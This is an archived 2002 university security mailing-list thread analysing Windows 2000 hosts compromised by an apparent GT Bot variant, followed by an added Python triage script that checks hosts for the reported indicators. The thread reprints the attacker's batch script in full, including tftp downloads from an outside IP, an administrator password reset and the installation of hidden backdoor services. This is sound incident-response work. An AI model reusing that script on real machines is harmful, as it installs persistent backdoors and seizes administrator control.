[unisog] Re: Coordinated Scan

Terry Cavender terry.cavender at vanderbilt.edu
Thu Apr 4 00:12:10 GMT 2002


You may also want to read this and note the security warning at the bottom.

	http://www.firedaemon.com/

Seems like a good product.


--On Wednesday, April 03, 2002 9:03 AM -0800 Huba Leidenfrost <huba at uidaho.edu> wrote:

>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> We fired off sample copies of what we saw here (as probably did many
> of you) to SOPHOS, NAV, & F-Secure.  F-Secure now has detection for
> this and I'm sure the others will follow.
>
> I haven't seen a conclusive writeup.  However it would appear that
> this is just another rendition of the global threat (GT Bot) as
> mentioned earlier (http://bots.lockdowncorp.com/gtbot.html).
> Although we still don't know exactly what the dropper was I'm
> inclined to believe that the reason was simply poor user habits in
> terms of surfing and password settings.  All the systems we saw
> hacked were 2000 Professional where the user had set their
> administrator password to nothing.
>
>    H  u  b  a
> - -
> HUBA LEIDENFROST           Systems Security Analyst
> huba at uidaho.edu     Information Technology Services
> University Of Idaho      TEL/FAX: 208.885.2126/7539
> http://www.its.uidaho.edu/info-security/runsafe.htm
>
> - -----Original Message-----
> From: Mark Newman [mailto:mnx at utk.edu]
> Sent: Wednesday, April 03, 2002 7:07 AM
> To: jeff_bollinger at unc.edu; Jeff Bollinger; Allen Chang
> Cc: unisog at sans.org; security at rescomp.berkeley.edu
> Subject: Re: [unisog] Re: Coordinated Scan
>
>
> Anyone found a conclusive writeup on this?
>
> Mark Newman
> University of Tennessee
>
> On Monday 01 April 2002 09:48 am, Jeff Bollinger wrote:
>> More on this attack.  Here is the actual .bat file used by the
>> attacker which gives some great clues:
>>
>> ----
>>
>> @echo off
>> c:
>> cd c:\winnt\system32\vmn32
>> mkdir \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
>> attrib +s +r +h \RECYCLER\S-1-5-21-2686636377-1107193052-384560437-1000
>> kill sxe*
>> kill temp.exe
>> del ..\2*.ocx
>> del ..\32*.ocx
>> del ..\temp2.exe
>> PATH=%PATH%;c:\winnt\system32
>> move firedaem.exe firedaemon.exe
>> del c:\winnt\system32\vmn32.exe
>> attrib *.* -r /s
>> attrib +s +h +r c:\winnt\system32\vmn32
>> attrib c:\winnt\system32\vmn32\asp +s +h
>> attrib c:\winnt\system32\vmn32\aspc +s +h
>> tftp -i 12.233.26.173 GET ir2.conf c:\winnt\system32\vmn32\asp\ir.conf
>> tftp -i 12.233.26.173 GET xir.conf c:\winnt\system32\vmn32\aspc\ir.conf
>> tftp -i 12.233.26.173 GET barm8.gif c:\winnt\system32\vmn32\barm8.gif
>> attrib *.* -r /s
>> net user administrator changem
>> net share /delete ipc$
>> SET MXHOME=c:\winnt\system32\vmn32
>> SET MXBIN=c:\winnt\system32\vmn32
>> c:\winnt\system32\vmn32\firedaemon -i Ms32dll
>> "c:\winnt\system32\vmn32" "c:\winnt\system32\vmn32\lsass.exe"
>> "c:\winnt\system32\vmn32\barm8.gif" Y 0 0 Y Y
>> c:\winnt\system32\vmn32\firedaemon -i SVHOST
>> "c:\winnt\system32\vmn32\asp"
>> "c:\winnt\system32\vmn32\asp\SVHOST.EXE"
>> "c:\winnt\system32\vmn32\asp\ir.conf" Y 0 0 Y Y
>> c:\winnt\system32\vmn32\firedaemon -i MSVC5
>> "c:\winnt\system32\vmn32\aspc"
>> "c:\winnt\system32\vmn32\aspc\SVHOST.EXE"
>> "c:\winnt\system32\vmn32\aspc\ir.conf" Y 0 0 Y Y
>> c:\winnt\system32\vmn32\services start Ms32dll
>> c:\winnt\system32\vmn32\services start SVHOST
>> c:\winnt\system32\vmn32\services start MSVC5
>> echo REGEDIT4  1>>root.reg
>> echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> root.reg
>> echo "restrictanonymous"="1" >> root.reg
>> echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> root.reg
>> echo "NTLM"="2" >> root.reg
>> regedit /S root.reg
>> del root.reg
>> services stop tlntsvr
>> services delete tlntsvr
>> services stop lmhosts
>> services start lmhosts
>> services start NtLmSsp
>> services stop PSEXESVC
>> services delete PSEXESVC
>>
>> Allen Chang wrote:
>> > Apologies if I break the thread...
>> >
>> > Here's my analysis of the compromised computers. First of all,
>> > this is not the Backdoor.darkIRC detected by antivirus programs.
>> > This backdoor is not detected by the latest NAV patterns.
>> >
>> > I'm guessing that these computers were compromised through the
>> > administrative share with no administrator password on Windows
>> > 2000.
>> >
>> > *A rogue lsass.exe (with a red u and a smaller green d icon) was
>> > installed as a service using firedaemon.exe (or firedaem.exe).
>> > You can check for it under Administrative Tools -> Services. The
>> > one on our hosts was called ms32dll.
>> > *Several .tmp files and a rudl32.exe are dropped in the Startup
>> > folder but the .tmp files don't seem to run.
>> > *Serve-U FTP, IRC and telnet servers are run on various ports.
>> > The IRC configurations (ir.conf) seem to indicate that they are set
>> > up as XDCC file-serving bots.
>> >
>> > Judging from this, one should be able to remove the service with
>> > a "firedaemon -u ms32dll". This seems to close all the opened
>> > ports but I am unsure as to what other damage may have been done.
>> >
>> > On all the hosts, nmap found the following ports open:
>> > Port       State       Service
>> > 132/tcp    open        cisco-sys <--tlntsvr.exe (telnet)
>> > 135/tcp    open        loc-srv <--svchost.exe
>> > 139/tcp    open        netbios-ssn <--NetBIOS sharing (normal)
>> > 445/tcp    open        microsoft-ds <-Windows sharing (kind of normal)
>> > 1025/tcp   open        listen <--mstask.exe (normal)
>> > 8888/tcp   open        sun-answerbook <-- sxe5.tmp (backdoor client)
>> >
>> > Running Vision 1.0 (www.foundstone.com) on the compromised
>> > computers yielded these additional ports and programs bound to
>> > them:
>> > 1029/tcp  <-- sxe5.tmp
>> > 1031/tcp <-- sxe5.tmp
>> > 43958/tcp <--c:\winnt\system32\vmn32\lsass.exe <-not to be confused with the other lsass.exe from MS
>> > 3112/tcp <-- c:\winnt\system32\vmn32\lsass.exe
>> >
>> > According to vmn\ServUStartUpLog.txt (Not confirmed)
>> > 3112 <-- ftp
>> >
>> > Hidden? (Never seen by me)
>> > 99/tcp <-- Backdoor command shell?
>> >
>> > (**Files Found**)
>> > C:\Documents and Settings\All Users\Start Menu\Programs\Startup
>> > rudl32.exe
>> > sxe3.tmp
>> > sxe4.tmp
>> > sxe5.tmp
>> >
>> > Other files mentioned at
>> > http://www.theorygroup.com/Archive/Unisog/2002/msg00334.html
>> >
>> > @llen
>> > Network Security
>> > Office of Residential Computing
>> > UC Berkeley
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
>
> iQA/AwUBPKs1w0pG2S0cMeJwEQLFlACg8TqRo7lO2jLMymLhvEME+CqROfEAoL1M
> 7H4fhOGU2CbFeKshjk8aZHHm
> =8+bO
> -----END PGP SIGNATURE-----
>



-----------------------------------------------------------------
Terry Cavender
Network Security Officer
Vanderbilt University
http://www.vanderbilt.edu/its/security
WK: 615-343-3494 Fx: 615-343-1605
terry.cavender at Vanderbilt.Edu
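The indicators the posters above report (firedaemon-installed services named Ms32dll, SVHOST and MSVC5; a second lsass.exe under c:\winnt\system32\vmn32; sxe*.tmp and rudl32.exe in the All Users Startup folder; the ports nmap and Vision 1.0 showed) can be turned into a host triage check. The script below is an added example written for this archive page, not code from the thread or from any of its posters. The snapshot layout it consumes (services, startup_files, listeners) and the Vision-style "port/tcp <-- image" line format it parses are this example's own assumptions modelled on what the thread shows; the sample host data is constructed, not captured.

```python
"""Triage check for the firedaemon / GT Bot compromise described in this thread.

Added example, not code from the thread or from any of its posters. It scores a
constructed host snapshot against the indicators reported above and returns one
finding per match. The snapshot layout (services / startup_files / listeners) is
an assumption of this example, not an output format of any tool named in the thread.
"""
import fnmatch
import ntpath
import re

# Indicators quoted from the thread (service names, paths, ports).
SUSPECT_SERVICES = {"ms32dll", "svhost", "msvc5"}
SUSPECT_DIR = r"c:\winnt\system32\vmn32"
STARTUP_DIR = r"c:\documents and settings\all users\start menu\programs\startup"
DROPPER_PATTERNS = ("sxe*.tmp", "rudl32.exe")
SUSPECT_PORTS = {
    99: "possible backdoor command shell",
    3112: "Serv-U FTP",
    8888: "sxe5.tmp backdoor client",
    43958: "rogue lsass.exe",
}
# The genuine LSA subsystem binary on Windows 2000; any other lsass.exe path is rogue.
LEGIT_LSASS = r"c:\winnt\system32\lsass.exe"

# Assumed shape of a Vision-style listener line, as the thread renders it:
# "<port>/tcp <-- <image>". Image paths containing spaces are not handled.
VISION_LINE = re.compile(r"^\s*(\d+)/tcp\s+<-+\s*(\S+)", re.MULTILINE)


def parse_vision(text):
    """Parse 'port/tcp <-- image' lines into (port, image) tuples."""
    return [(int(port), image) for port, image in VISION_LINE.findall(text)]


def check_host(snapshot):
    """Return one finding string per matched indicator; an empty list means clean."""
    findings = []

    # Services: known GT Bot service names, or anything wrapped by firedaemon.
    for svc in snapshot.get("services", []):
        name, image = svc["name"], svc.get("image", "")
        if name.lower() in SUSPECT_SERVICES:
            findings.append(f"service {name} matches GT Bot service name ({image})")
        elif "firedaemon" in image.lower():
            findings.append(f"service {name} is wrapped by firedaemon ({image})")

    # Startup folder: the sxe*.tmp and rudl32.exe dropper artifacts.
    for path in snapshot.get("startup_files", []):
        directory, fname = ntpath.split(path)
        if directory.lower() == STARTUP_DIR and any(
            fnmatch.fnmatch(fname.lower(), pat) for pat in DROPPER_PATTERNS
        ):
            findings.append(f"dropper artifact in Startup folder: {path}")

    # Listeners: rogue lsass.exe, binaries under vmn32, dropper binaries, known ports.
    for port, image in snapshot.get("listeners", []):
        image_l = image.lower()
        base = ntpath.basename(image_l)
        if base == "lsass.exe" and image_l != LEGIT_LSASS:
            findings.append(f"lsass.exe on {port}/tcp from non-system path: {image}")
        elif image_l.startswith(SUSPECT_DIR + "\\"):
            findings.append(f"binary from {SUSPECT_DIR} listening on {port}/tcp: {image}")
        elif any(fnmatch.fnmatch(base, pat) for pat in DROPPER_PATTERNS):
            findings.append(f"dropper binary listening on {port}/tcp: {image}")
        elif port in SUSPECT_PORTS:
            findings.append(f"{port}/tcp open ({SUSPECT_PORTS[port]}): {image}")

    return findings


# Constructed sample data modelled on what the posters reported; not real host output.
SAMPLE_VISION = r"""1029/tcp  <-- sxe5.tmp
1031/tcp <-- sxe5.tmp
43958/tcp <--c:\winnt\system32\vmn32\lsass.exe
3112/tcp <-- c:\winnt\system32\vmn32\lsass.exe
135/tcp <-- svchost.exe
"""

SAMPLE_HOST = {
    "services": [
        {"name": "Ms32dll", "image": r"c:\winnt\system32\vmn32\firedaemon.exe"},
        {"name": "SVHOST", "image": r"c:\winnt\system32\vmn32\firedaemon.exe"},
        {"name": "Spooler", "image": r"c:\winnt\system32\spoolsv.exe"},
    ],
    "startup_files": [
        r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rudl32.exe",
        r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\sxe5.tmp",
        r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\desktop.ini",
    ],
    "listeners": parse_vision(SAMPLE_VISION),
}

CLEAN_HOST = {
    "services": [{"name": "Spooler", "image": r"c:\winnt\system32\spoolsv.exe"}],
    "startup_files": [],
    "listeners": [(135, r"c:\winnt\system32\svchost.exe"), (445, "System")],
}

if __name__ == "__main__":
    for finding in check_host(SAMPLE_HOST):
        print(finding)
```

Running it against the constructed snapshot prints eight findings: both firedaemon-wrapped services, the two Startup folder artifacts, and the four suspect listeners (two sxe5.tmp sockets and the two ports bound to the vmn32 lsass.exe). The rogue-lsass.exe rule keys on path rather than name, which is the point Allen makes about the second lsass.exe not being the Microsoft one.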


